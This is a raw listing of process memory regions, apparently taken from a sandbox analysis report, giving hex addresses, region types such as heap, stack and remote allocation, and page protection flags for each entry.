2295D0D0000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2BAAA074000
|
unkown
|
page read and write
|
||
|
721237E000
|
stack
|
page read and write
|
||
|
287293AC000
|
heap
|
page read and write
|
||
|
1DDAF1E4000
|
heap
|
page read and write
|
||
|
28728CD2000
|
heap
|
page read and write
|
||
|
26A88448000
|
heap
|
page read and write
|
||
|
1DDAECD7000
|
heap
|
page read and write
|
||
|
4D16000
|
unkown
|
page read and write
|
||
|
761E000
|
unkown
|
page read and write
|
||
|
202C0B32000
|
unkown
|
page readonly
|
||
|
26A88437000
|
heap
|
page read and write
|
||
|
1C8DC1E5000
|
heap
|
page read and write
|
||
|
20413004000
|
heap
|
page read and write
|
||
|
13801104000
|
trusted library allocation
|
page read and write
|
||
|
20411789000
|
heap
|
page read and write
|
||
|
7FF581471000
|
unkown
|
page readonly
|
||
|
276188BD000
|
heap
|
page read and write
|
||
|
1E085030000
|
trusted library allocation
|
page read and write
|
||
|
20410F84000
|
heap
|
page read and write
|
||
|
1C8DBF30000
|
heap
|
page read and write
|
||
|
28728CFF000
|
heap
|
page read and write
|
||
|
684C6FE000
|
stack
|
page read and write
|
||
|
1E4E9F38000
|
heap
|
page read and write
|
||
|
7FFD9B6CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DDAEA1F000
|
heap
|
page read and write
|
||
|
7FF581452000
|
unkown
|
page readonly
|
||
|
26A87D20000
|
heap
|
page read and write
|
||
|
27618E69000
|
heap
|
page read and write
|
||
|
1C8DC0E5000
|
heap
|
page read and write
|
||
|
7FF52D161000
|
unkown
|
page readonly
|
||
|
7FF582BE6000
|
unkown
|
page readonly
|
||
|
2530E9F5000
|
heap
|
page read and write
|
||
|
202BFA30000
|
unkown
|
page readonly
|
||
|
1E085450000
|
heap
|
page read and write
|
||
|
1E084F59000
|
heap
|
page read and write
|
||
|
2BAAACD2000
|
unkown
|
page read and write
|
||
|
FC850FE000
|
stack
|
page read and write
|
||
|
2BAAD690000
|
unkown
|
page readonly
|
||
|
7FF5A90B2000
|
unkown
|
page readonly
|
||
|
28728EB5000
|
heap
|
page read and write
|
||
|
1E0855D9000
|
heap
|
page read and write
|
||
|
1386FB00000
|
trusted library section
|
page read and write
|
||
|
1E4E9F2E000
|
heap
|
page read and write
|
||
|
4950000
|
unkown
|
page readonly
|
||
|
202BFD13000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1E084F91000
|
heap
|
page read and write
|
||
|
EADE7C8000
|
stack
|
page read and write
|
||
|
276188CC000
|
heap
|
page read and write
|
||
|
20410F8E000
|
heap
|
page read and write
|
||
|
20410F86000
|
heap
|
page read and write
|
||
|
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
|
1DDAEA48000
|
heap
|
page read and write
|
||
|
28728CB0000
|
heap
|
page read and write
|
||
|
20410FA8000
|
heap
|
page read and write
|
||
|
1C8EE6EB000
|
trusted library allocation
|
page read and write
|
||
|
73F9000
|
unkown
|
page read and write
|
||
|
A92577C000
|
unkown
|
page read and write
|
||
|
2A6612D0000
|
unkown
|
page execute and read and write
|
||
|
7FF5135E9000
|
unkown
|
page readonly
|
||
|
276187BB000
|
heap
|
page read and write
|
||
|
2A660550000
|
unkown
|
page readonly
|
||
|
2295CD80000
|
unkown
|
page read and write
|
||
|
7FF58135F000
|
unkown
|
page readonly
|
||
|
7FF51354C000
|
unkown
|
page readonly
|
||
|
710D000
|
unkown
|
page read and write
|
||
|
26A88433000
|
heap
|
page read and write
|
||
|
2295CD50000
|
heap
|
page read and write
|
||
|
2BAAC5E5000
|
unkown
|
page read and write
|
||
|
7FF512469000
|
unkown
|
page readonly
|
||
|
1DDAF1E8000
|
heap
|
page read and write
|
||
|
2BAAC57A000
|
unkown
|
page read and write
|
||
|
1DDAE9C7000
|
heap
|
page read and write
|
||
|
20410F8E000
|
heap
|
page read and write
|
||
|
7FFDE21F0000
|
unkown
|
page execute read
|
||
|
7FF52CD82000
|
unkown
|
page readonly
|
||
|
1380172E000
|
trusted library allocation
|
page read and write
|
||
|
26A88454000
|
heap
|
page read and write
|
||
|
1A610535000
|
heap
|
page read and write
|
||
|
28728CFF000
|
heap
|
page read and write
|
||
|
2BAADD90000
|
unkown
|
page readonly
|
||
|
2BAB067E000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
26A88451000
|
heap
|
page read and write
|
||
|
26A88412000
|
heap
|
page read and write
|
||
|
27B0719F000
|
unkown
|
page read and write
|
||
|
7FF5135B8000
|
unkown
|
page readonly
|
||
|
7720000
|
unkown
|
page read and write
|
||
|
28728C40000
|
heap
|
page read and write
|
||
|
7DF486A01000
|
unkown
|
page execute read
|
||
|
1E085010000
|
heap
|
page read and write
|
||
|
26A89CD4000
|
heap
|
page read and write
|
||
|
6B02DFE000
|
stack
|
page read and write
|
||
|
C5F6CFD000
|
stack
|
page read and write
|
||
|
2BAAA0A9000
|
unkown
|
page read and write
|
||
|
2872ACCE000
|
heap
|
page read and write
|
||
|
F25A8FE000
|
stack
|
page read and write
|
||
|
2BAAE15D000
|
unkown
|
page read and write
|
||
|
A92644E000
|
unkown
|
page read and write
|
||
|
2220AB60000
|
remote allocation
|
page execute and read and write
|
||
|
1DDAE9C2000
|
heap
|
page read and write
|
||
|
2BAAAD38000
|
unkown
|
page read and write
|
||
|
1E0855E9000
|
heap
|
page read and write
|
||
|
287293C9000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
27618E3E000
|
heap
|
page read and write
|
||
|
24D9FF70000
|
direct allocation
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
77AB000
|
unkown
|
page read and write
|
||
|
1F2F1BC000
|
stack
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1E084F42000
|
heap
|
page read and write
|
||
|
1E084F25000
|
heap
|
page read and write
|
||
|
1C8F61B4000
|
heap
|
page read and write
|
||
|
1E4E9F67000
|
heap
|
page read and write
|
||
|
1DDAF202000
|
heap
|
page read and write
|
||
|
6EBF000
|
unkown
|
page read and write
|
||
|
2BAADC90000
|
unkown
|
page readonly
|
||
|
7FF55036B000
|
unkown
|
page readonly
|
||
|
7FF582B71000
|
unkown
|
page readonly
|
||
|
26A88453000
|
heap
|
page read and write
|
||
|
EDEC47F000
|
stack
|
page read and write
|
||
|
30F0000
|
unkown
|
page read and write
|
||
|
27618894000
|
heap
|
page read and write
|
||
|
202C034C000
|
unkown
|
page read and write
|
||
|
2BAAA076000
|
unkown
|
page read and write
|
||
|
1E4E9F20000
|
heap
|
page read and write
|
||
|
26A8843B000
|
heap
|
page read and write
|
||
|
20412FF2000
|
heap
|
page read and write
|
||
|
1A610530000
|
heap
|
page read and write
|
||
|
7FF513561000
|
unkown
|
page readonly
|
||
|
1386FBA0000
|
heap
|
page execute and read and write
|
||
|
202C0268000
|
unkown
|
page read and write
|
||
|
1DDAEA18000
|
heap
|
page read and write
|
||
|
1DDAF1F9000
|
heap
|
page read and write
|
||
|
1DDAEA49000
|
heap
|
page read and write
|
||
|
2BAAF1A0000
|
unkown
|
page execute and read and write
|
||
|
7FF582BC2000
|
unkown
|
page readonly
|
||
|
3288000
|
heap
|
page read and write
|
||
|
8B387FE000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2E7F000
|
unkown
|
page read and write
|
||
|
7DF486A31000
|
unkown
|
page execute read
|
||
|
2295CE00000
|
unkown
|
page read and write
|
||
|
202C0B30000
|
unkown
|
page read and write
|
||
|
7FF5812E6000
|
unkown
|
page readonly
|
||
|
27618E37000
|
heap
|
page read and write
|
||
|
23ED95A0000
|
heap
|
page read and write
|
||
|
7DF486A40000
|
unkown
|
page readonly
|
||
|
2D0D5145000
|
heap
|
page read and write
|
||
|
4AF9000
|
unkown
|
page read and write
|
||
|
276186B0000
|
heap
|
page read and write
|
||
|
7FF51243B000
|
unkown
|
page readonly
|
||
|
2BAA7AFB000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAEA20000
|
heap
|
page read and write
|
||
|
21A1F6C4000
|
heap
|
page read and write
|
||
|
1DDAF1ED000
|
heap
|
page read and write
|
||
|
258004F3000
|
unkown
|
page read and write
|
||
|
1E085464000
|
heap
|
page read and write
|
||
|
7FFD9BA18000
|
trusted library allocation
|
page read and write
|
||
|
20410F86000
|
heap
|
page read and write
|
||
|
A9251D4000
|
unkown
|
page read and write
|
||
|
26A87213000
|
unkown
|
page read and write
|
||
|
1386FBC2000
|
heap
|
page read and write
|
||
|
2BAAD318000
|
unkown
|
page read and write
|
||
|
1DDB0A84000
|
heap
|
page read and write
|
||
|
2872ACC3000
|
heap
|
page read and write
|
||
|
202C0A60000
|
unkown
|
page write copy
|
||
|
2041176E000
|
heap
|
page read and write
|
||
|
8C9A5FE000
|
stack
|
page read and write
|
||
|
75EA278000
|
stack
|
page read and write
|
||
|
1DDAEA09000
|
heap
|
page read and write
|
||
|
1DDAE980000
|
heap
|
page read and write
|
||
|
4A9C000
|
unkown
|
page read and write
|
||
|
1E084F48000
|
heap
|
page read and write
|
||
|
7FF58127B000
|
unkown
|
page readonly
|
||
|
2761A6EE000
|
heap
|
page read and write
|
||
|
28728CCD000
|
heap
|
page read and write
|
||
|
1DDAEA00000
|
heap
|
page read and write
|
||
|
2BAAA058000
|
unkown
|
page read and write
|
||
|
2A6605E0000
|
heap
|
page read and write
|
||
|
1E084F25000
|
heap
|
page read and write
|
||
|
2BAACADD000
|
unkown
|
page read and write
|
||
|
2BAADCA0000
|
unkown
|
page readonly
|
||
|
20410F3E000
|
heap
|
page read and write
|
||
|
2D0D5151000
|
trusted library allocation
|
page read and write
|
||
|
21A1F6A5000
|
heap
|
page read and write
|
||
|
25800081000
|
unkown
|
page read and write
|
||
|
2BAAD31D000
|
unkown
|
page read and write
|
||
|
7FF581321000
|
unkown
|
page readonly
|
||
|
2BAAACF5000
|
unkown
|
page read and write
|
||
|
2F1D000
|
heap
|
page read and write
|
||
|
7FF582BBE000
|
unkown
|
page readonly
|
||
|
202C01C1000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
2A660A00000
|
unkown
|
page read and write
|
||
|
4CA7FE000
|
stack
|
page read and write
|
||
|
1DDAEA1E000
|
heap
|
page read and write
|
||
|
13810001000
|
trusted library allocation
|
page read and write
|
||
|
1DDAEBA0000
|
trusted library allocation
|
page read and write
|
||
|
2761889D000
|
heap
|
page read and write
|
||
|
1386FBC8000
|
heap
|
page read and write
|
||
|
2CE0000
|
unkown
|
page read and write
|
||
|
1C8EE6DF000
|
trusted library allocation
|
page read and write
|
||
|
1C8EE6E1000
|
trusted library allocation
|
page read and write
|
||
|
2D0D49F0000
|
heap
|
page read and write
|
||
|
2872ACD4000
|
heap
|
page read and write
|
||
|
2BAB0604000
|
unkown
|
page read and write
|
||
|
276187B0000
|
heap
|
page read and write
|
||
|
202C0418000
|
unkown
|
page read and write
|
||
|
20410F8E000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAEA13000
|
heap
|
page read and write
|
||
|
7FFD9B766000
|
trusted library allocation
|
page read and write
|
||
|
2761A6E1000
|
heap
|
page read and write
|
||
|
7FF581260000
|
unkown
|
page readonly
|
||
|
2BAADD10000
|
unkown
|
page read and write
|
||
|
8B385ED000
|
unkown
|
page read and write
|
||
|
2BAA951E000
|
unkown
|
page read and write
|
||
|
2BAAE595000
|
unkown
|
page read and write
|
||
|
24D9FF85000
|
direct allocation
|
page readonly
|
||
|
EDEC1B8000
|
stack
|
page read and write
|
||
|
7FF52D12E000
|
unkown
|
page readonly
|
||
|
28728CCE000
|
heap
|
page read and write
|
||
|
2BAAAD01000
|
unkown
|
page read and write
|
||
|
7FF58126C000
|
unkown
|
page readonly
|
||
|
BA7316E000
|
unkown
|
page read and write
|
||
|
1E086E5D000
|
heap
|
page read and write
|
||
|
76A0000
|
unkown
|
page read and write
|
||
|
30D7000
|
unkown
|
page execute and read and write
|
||
|
2BAAD530000
|
unkown
|
page read and write
|
||
|
24DA1BA6000
|
unkown
|
page read and write
|
||
|
2A660C00000
|
unkown
|
page readonly
|
||
|
6E0F000
|
unkown
|
page read and write
|
||
|
C5F647C000
|
stack
|
page read and write
|
||
|
1C8DC020000
|
heap
|
page read and write
|
||
|
C19D97F000
|
stack
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1386FDC0000
|
heap
|
page execute and read and write
|
||
|
20410F69000
|
heap
|
page read and write
|
||
|
7FFD9B9B8000
|
trusted library allocation
|
page read and write
|
||
|
1DDAEBD0000
|
heap
|
page read and write
|
||
|
202C046C000
|
unkown
|
page read and write
|
||
|
F25ADFE000
|
stack
|
page read and write
|
||
|
13800001000
|
trusted library allocation
|
page read and write
|
||
|
2BAA9476000
|
unkown
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
7FF58133A000
|
unkown
|
page readonly
|
||
|
13801803000
|
trusted library allocation
|
page read and write
|
||
|
276188BD000
|
heap
|
page read and write
|
||
|
24D9FF20000
|
unkown
|
page readonly
|
||
|
7FF52D194000
|
unkown
|
page readonly
|
||
|
28DD000
|
stack
|
page read and write
|
||
|
225DC581000
|
unkown
|
page readonly
|
||
|
2BAACAF1000
|
unkown
|
page read and write
|
||
|
1DDAEA21000
|
heap
|
page read and write
|
||
|
7DF486A81000
|
unkown
|
page execute read
|
||
|
BA731EE000
|
stack
|
page read and write
|
||
|
20412FFD000
|
heap
|
page read and write
|
||
|
2041176E000
|
heap
|
page read and write
|
||
|
20410F91000
|
heap
|
page read and write
|
||
|
80742FF000
|
unkown
|
page read and write
|
||
|
1E0855E2000
|
heap
|
page read and write
|
||
|
1E085462000
|
heap
|
page read and write
|
||
|
2BAAD365000
|
unkown
|
page read and write
|
||
|
2BAAD5AF000
|
unkown
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2BAAD355000
|
unkown
|
page read and write
|
||
|
28728CCF000
|
heap
|
page read and write
|
||
|
2BAA7A60000
|
unkown
|
page read and write
|
||
|
2BAAC5BF000
|
unkown
|
page read and write
|
||
|
26A87A00000
|
unkown
|
page read and write
|
||
|
7FF582C39000
|
unkown
|
page readonly
|
||
|
2A66067B000
|
unkown
|
page read and write
|
||
|
2BAAE38C000
|
unkown
|
page read and write
|
||
|
2BAA9FB0000
|
unkown
|
page read and write
|
||
|
24D9FFC0000
|
direct allocation
|
page read and write
|
||
|
225DBF00000
|
unkown
|
page readonly
|
||
|
7FF550519000
|
unkown
|
page readonly
|
||
|
202C0277000
|
unkown
|
page read and write
|
||
|
1E084F7F000
|
heap
|
page read and write
|
||
|
2A6605D0000
|
unkown
|
page readonly
|
||
|
1380092F000
|
trusted library allocation
|
page read and write
|
||
|
13870372000
|
heap
|
page read and write
|
||
|
26A87E02000
|
heap
|
page read and write
|
||
|
1DDAEA18000
|
heap
|
page read and write
|
||
|
D01AA73000
|
stack
|
page read and write
|
||
|
4940000
|
heap
|
page read and write
|
||
|
26A8842C000
|
heap
|
page read and write
|
||
|
2D0D5110000
|
heap
|
page read and write
|
||
|
26A87DA0000
|
heap
|
page read and write
|
||
|
276188C2000
|
heap
|
page read and write
|
||
|
2BAAA07C000
|
unkown
|
page read and write
|
||
|
7FF52D17F000
|
unkown
|
page readonly
|
||
|
276188B9000
|
heap
|
page read and write
|
||
|
1E085085000
|
heap
|
page read and write
|
||
|
26A8841B000
|
heap
|
page read and write
|
||
|
17952FE0000
|
unkown
|
page readonly
|
||
|
2761A6EE000
|
heap
|
page read and write
|
||
|
7FF52CC8D000
|
unkown
|
page readonly
|
||
|
7FF582BB1000
|
unkown
|
page readonly
|
||
|
8B3887F000
|
unkown
|
page read and write
|
||
|
26A87140000
|
unkown
|
page readonly
|
||
|
A81DE7F000
|
unkown
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
2BAB0624000
|
unkown
|
page read and write
|
||
|
1E084F62000
|
heap
|
page read and write
|
||
|
7FF51236E000
|
unkown
|
page readonly
|
||
|
2DC5000
|
heap
|
page read and write
|
||
|
2BAAC8C8000
|
unkown
|
page read and write
|
||
|
49BE000
|
unkown
|
page read and write
|
||
|
A9263FE000
|
unkown
|
page read and write
|
||
|
26A87150000
|
unkown
|
page readonly
|
||
|
2BAA7B24000
|
heap
|
page read and write
|
||
|
225DC699000
|
unkown
|
page readonly
|
||
|
26A87E47000
|
heap
|
page read and write
|
||
|
7DF4869C1000
|
unkown
|
page execute read
|
||
|
75EA37E000
|
stack
|
page read and write
|
||
|
276187E0000
|
trusted library allocation
|
page read and write
|
||
|
7437000
|
unkown
|
page read and write
|
||
|
26A88434000
|
heap
|
page read and write
|
||
|
A9258F8000
|
unkown
|
page read and write
|
||
|
D01BBCE000
|
unkown
|
page read and write
|
||
|
1C8DBC7B000
|
unkown
|
page readonly
|
||
|
20410F91000
|
heap
|
page read and write
|
||
|
276187E0000
|
trusted library allocation
|
page read and write
|
||
|
733E000
|
unkown
|
page read and write
|
||
|
2BAACAF4000
|
unkown
|
page read and write
|
||
|
8B385F3000
|
unkown
|
page read and write
|
||
|
2761A6EE000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
27B002D2000
|
unkown
|
page read and write
|
||
|
2A661300000
|
remote allocation
|
page execute and read and write
|
||
|
26A87D40000
|
trusted library allocation
|
page read and write
|
||
|
A92654C000
|
stack
|
page read and write
|
||
|
276188B3000
|
heap
|
page read and write
|
||
|
72BE000
|
unkown
|
page read and write
|
||
|
1DDB0A7E000
|
heap
|
page read and write
|
||
|
202BFA20000
|
heap
|
page read and write
|
||
|
7FF5122D6000
|
unkown
|
page readonly
|
||
|
202BFCBE000
|
unkown
|
page read and write
|
||
|
20410F8B000
|
heap
|
page read and write
|
||
|
3F99B87000
|
stack
|
page read and write
|
||
|
20410FCF000
|
heap
|
page read and write
|
||
|
30D0000
|
unkown
|
page read and write
|
||
|
287293BF000
|
heap
|
page read and write
|
||
|
2580047E000
|
unkown
|
page read and write
|
||
|
26A87E48000
|
heap
|
page read and write
|
||
|
26A89CC2000
|
heap
|
page read and write
|
||
|
2BAAA088000
|
unkown
|
page read and write
|
||
|
7FFD9B894000
|
trusted library allocation
|
page read and write
|
||
|
1E084F25000
|
heap
|
page read and write
|
||
|
2BAAC604000
|
unkown
|
page read and write
|
||
|
1DDAEA17000
|
heap
|
page read and write
|
||
|
1381008E000
|
trusted library allocation
|
page read and write
|
||
|
20411761000
|
heap
|
page read and write
|
||
|
2BAAE5A5000
|
unkown
|
page read and write
|
||
|
1E084F2E000
|
heap
|
page read and write
|
||
|
1F2EF7A000
|
stack
|
page read and write
|
||
|
2BAAB96A000
|
unkown
|
page read and write
|
||
|
28728CFF000
|
heap
|
page read and write
|
||
|
26A871D0000
|
heap
|
page read and write
|
||
|
287293BF000
|
heap
|
page read and write
|
||
|
1DDAEA25000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
71BE000
|
unkown
|
page read and write
|
||
|
1DDAE9EE000
|
heap
|
page read and write
|
||
|
76E0000
|
unkown
|
page read and write
|
||
|
C7E9BFE000
|
unkown
|
page readonly
|
||
|
2BAAA067000
|
unkown
|
page read and write
|
||
|
684C7FF000
|
stack
|
page read and write
|
||
|
7FF52D1F6000
|
unkown
|
page readonly
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
287293AC000
|
heap
|
page read and write
|
||
|
138703DE000
|
heap
|
page read and write
|
||
|
7680000
|
unkown
|
page read and write
|
||
|
5AF8000
|
unkown
|
page read and write
|
||
|
8B3835F000
|
stack
|
page read and write
|
||
|
13801060000
|
trusted library allocation
|
page read and write
|
||
|
21A1F696000
|
heap
|
page read and write
|
||
|
2041177A000
|
heap
|
page read and write
|
||
|
D01A8D4000
|
unkown
|
page read and write
|
||
|
1386DFF0000
|
heap
|
page read and write
|
||
|
225DBFC1000
|
unkown
|
page readonly
|
||
|
2041120E000
|
heap
|
page read and write
|
||
|
4B5F000
|
unkown
|
page read and write
|
||
|
2BAAC7C0000
|
unkown
|
page read and write
|
||
|
2BAA9472000
|
unkown
|
page read and write
|
||
|
138001BA000
|
trusted library allocation
|
page read and write
|
||
|
27618E52000
|
heap
|
page read and write
|
||
|
27618E3E000
|
heap
|
page read and write
|
||
|
2BAAC55B000
|
unkown
|
page read and write
|
||
|
2BAADD60000
|
unkown
|
page readonly
|
||
|
13870690000
|
heap
|
page read and write
|
||
|
2BAA94FC000
|
unkown
|
page read and write
|
||
|
3F99F7F000
|
stack
|
page read and write
|
||
|
225DC692000
|
unkown
|
page readonly
|
||
|
721257E000
|
stack
|
page read and write
|
||
|
20410EB0000
|
heap
|
page read and write
|
||
|
26A871F1000
|
unkown
|
page readonly
|
||
|
1F2EFFD000
|
stack
|
page read and write
|
||
|
7FF581347000
|
unkown
|
page readonly
|
||
|
27B06C2D000
|
unkown
|
page read and write
|
||
|
2BAAE398000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
26A88448000
|
heap
|
page read and write
|
||
|
20410F9D000
|
heap
|
page read and write
|
||
|
202C0379000
|
unkown
|
page read and write
|
||
|
13870162000
|
heap
|
page read and write
|
||
|
2BAAAD3D000
|
unkown
|
page read and write
|
||
|
7FFD9BA09000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
FC84F7B000
|
stack
|
page read and write
|
||
|
20410F8E000
|
heap
|
page read and write
|
||
|
7FF581432000
|
unkown
|
page readonly
|
||
|
1E084F3F000
|
heap
|
page read and write
|
||
|
2BAAC56A000
|
unkown
|
page read and write
|
||
|
7FF5133F2000
|
unkown
|
page readonly
|
||
|
1F2F2BF000
|
stack
|
page read and write
|
||
|
26A87E47000
|
heap
|
page read and write
|
||
|
7FF581342000
|
unkown
|
page readonly
|
||
|
2AB7000
|
stack
|
page read and write
|
||
|
1DDAE9E8000
|
heap
|
page read and write
|
||
|
D01BC4E000
|
stack
|
page read and write
|
||
|
7FF513182000
|
unkown
|
page readonly
|
||
|
A925A7B000
|
unkown
|
page read and write
|
||
|
24D9FF71000
|
direct allocation
|
page execute read
|
||
|
225DBF60000
|
unkown
|
page read and write
|
||
|
258002DE000
|
unkown
|
page read and write
|
||
|
1DDAEA0C000
|
heap
|
page read and write
|
||
|
2BAAC574000
|
unkown
|
page read and write
|
||
|
2BAB0656000
|
unkown
|
page read and write
|
||
|
8C9A7FF000
|
stack
|
page read and write
|
||
|
2BAAE3D2000
|
unkown
|
page read and write
|
||
|
1DDAF1D9000
|
heap
|
page read and write
|
||
|
2BAAD6F0000
|
unkown
|
page readonly
|
||
|
1E084FF0000
|
heap
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
20410F42000
|
heap
|
page read and write
|
||
|
C5F68FE000
|
unkown
|
page readonly
|
||
|
1F2F4BB000
|
stack
|
page read and write
|
||
|
202C0400000
|
unkown
|
page read and write
|
||
|
20412FF1000
|
heap
|
page read and write
|
||
|
1DDAEA1D000
|
heap
|
page read and write
|
||
|
202C045D000
|
unkown
|
page read and write
|
||
|
E2BF2FE000
|
unkown
|
page readonly
|
||
|
7FF513521000
|
unkown
|
page readonly
|
||
|
A92664F000
|
stack
|
page read and write
|
||
|
C5F6EFC000
|
stack
|
page read and write
|
||
|
7FF5A9542000
|
unkown
|
page readonly
|
||
|
2BAA9558000
|
unkown
|
page read and write
|
||
|
27B07A0B000
|
unkown
|
page read and write
|
||
|
2BAAC7E4000
|
unkown
|
page read and write
|
||
|
2BAAC576000
|
unkown
|
page read and write
|
||
|
13870441000
|
heap
|
page read and write
|
||
|
20410F86000
|
heap
|
page read and write
|
||
|
202C02FE000
|
unkown
|
page read and write
|
||
|
225DC610000
|
unkown
|
page execute and read and write
|
||
|
2A660A02000
|
unkown
|
page read and write
|
||
|
7FF581491000
|
unkown
|
page readonly
|
||
|
26A87E3F000
|
heap
|
page read and write
|
||
|
6F3F000
|
unkown
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
26A88451000
|
heap
|
page read and write
|
||
|
20410F99000
|
heap
|
page read and write
|
||
|
27B06C43000
|
unkown
|
page read and write
|
||
|
2D0D49E4000
|
heap
|
page read and write
|
||
|
26A89CD4000
|
heap
|
page read and write
|
||
|
2BAAE8E5000
|
unkown
|
page read and write
|
||
|
2295CD61000
|
unkown
|
page readonly
|
||
|
1387044D000
|
heap
|
page read and write
|
||
|
7FF581274000
|
unkown
|
page readonly
|
||
|
202C048B000
|
unkown
|
page read and write
|
||
|
7FF52CBD1000
|
unkown
|
page readonly
|
||
|
7FF5A945A000
|
unkown
|
page readonly
|
||
|
4D0A000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF4BDDC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2F137000
|
stack
|
page read and write
|
||
|
1F2FF8C000
|
stack
|
page read and write
|
||
|
276188BD000
|
heap
|
page read and write
|
||
|
1DDAEA25000
|
heap
|
page read and write
|
||
|
26A89E20000
|
heap
|
page read and write
|
||
|
26A87990000
|
unkown
|
page execute and read and write
|
||
|
2BAAE64D000
|
unkown
|
page read and write
|
||
|
13801038000
|
trusted library allocation
|
page read and write
|
||
|
C19D5FF000
|
stack
|
page read and write
|
||
|
8B38A7B000
|
unkown
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
2BAA7CB5000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
4CAFFC000
|
stack
|
page read and write
|
||
|
3F99FFF000
|
stack
|
page read and write
|
||
|
2BAADD50000
|
unkown
|
page readonly
|
||
|
D01ADFD000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
2A660715000
|
unkown
|
page read and write
|
||
|
26A87970000
|
unkown
|
page readonly
|
||
|
13870172000
|
heap
|
page read and write
|
||
|
6B026FE000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
24D9FD4C000
|
heap
|
page read and write
|
||
|
7DF486AA1000
|
unkown
|
page execute read
|
||
|
C7E93FE000
|
unkown
|
page readonly
|
||
|
741E000
|
unkown
|
page read and write
|
||
|
2BAAD5CB000
|
unkown
|
page read and write
|
||
|
1E08546A000
|
heap
|
page read and write
|
||
|
1E0855E2000
|
heap
|
page read and write
|
||
|
21A1F69A000
|
heap
|
page read and write
|
||
|
A9251E8000
|
unkown
|
page read and write
|
||
|
30D5000
|
unkown
|
page execute and read and write
|
||
|
20410F91000
|
heap
|
page read and write
|
||
|
1DDAECDE000
|
heap
|
page read and write
|
||
|
1DDAF1D7000
|
heap
|
page read and write
|
||
|
2BAAE57C000
|
unkown
|
page read and write
|
||
|
21A1F698000
|
heap
|
page read and write
|
||
|
13800DD8000
|
trusted library allocation
|
page read and write
|
||
|
C5F6FFE000
|
unkown
|
page readonly
|
||
|
26A87E07000
|
heap
|
page read and write
|
||
|
2BAAD0D0000
|
unkown
|
page readonly
|
||
|
2BAAE58F000
|
unkown
|
page read and write
|
||
|
7FF5A951B000
|
unkown
|
page readonly
|
||
|
1DDAEA40000
|
heap
|
page read and write
|
||
|
7FF5A9511000
|
unkown
|
page readonly
|
||
|
BC0907E000
|
unkown
|
page readonly
|
||
|
7FF581326000
|
unkown
|
page readonly
|
||
|
20411782000
|
heap
|
page read and write
|
||
|
8C9ADFB000
|
stack
|
page read and write
|
||
|
2BAACA23000
|
unkown
|
page read and write
|
||
|
76B0000
|
unkown
|
page read and write
|
||
|
7FF581270000
|
unkown
|
page readonly
|
||
|
493F000
|
unkown
|
page read and write
|
||
|
2BAAE837000
|
unkown
|
page read and write
|
||
|
7FFD9B897000
|
trusted library allocation
|
page read and write
|
||
|
28728CB3000
|
heap
|
page read and write
|
||
|
2BAAD6E0000
|
unkown
|
page readonly
|
||
|
26A88451000
|
heap
|
page read and write
|
||
|
2D0D4940000
|
heap
|
page read and write
|
||
|
28728F10000
|
heap
|
page read and write
|
||
|
EDEC5FE000
|
stack
|
page read and write
|
||
|
7760000
|
unkown
|
page execute and read and write
|
||
|
20410FA3000
|
heap
|
page read and write
|
||
|
EDEC57F000
|
stack
|
page read and write
|
||
|
1DDAEA12000
|
heap
|
page read and write
|
||
|
1E0855E5000
|
heap
|
page read and write
|
||
|
7700000
|
unkown
|
page read and write
|
||
|
1E084F7B000
|
heap
|
page read and write
|
||
|
2041120A000
|
heap
|
page read and write
|
||
|
2BAADF20000
|
unkown
|
page read and write
|
||
|
276188EA000
|
heap
|
page read and write
|
||
|
2041175E000
|
heap
|
page read and write
|
||
|
26A8841A000
|
heap
|
page read and write
|
||
|
1386E078000
|
heap
|
page read and write
|
||
|
20410FA4000
|
heap
|
page read and write
|
||
|
2BAAE5B7000
|
unkown
|
page read and write
|
||
|
138703B3000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
20410F93000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F6290000
|
trusted library allocation
|
page execute and read and write
|
||
|
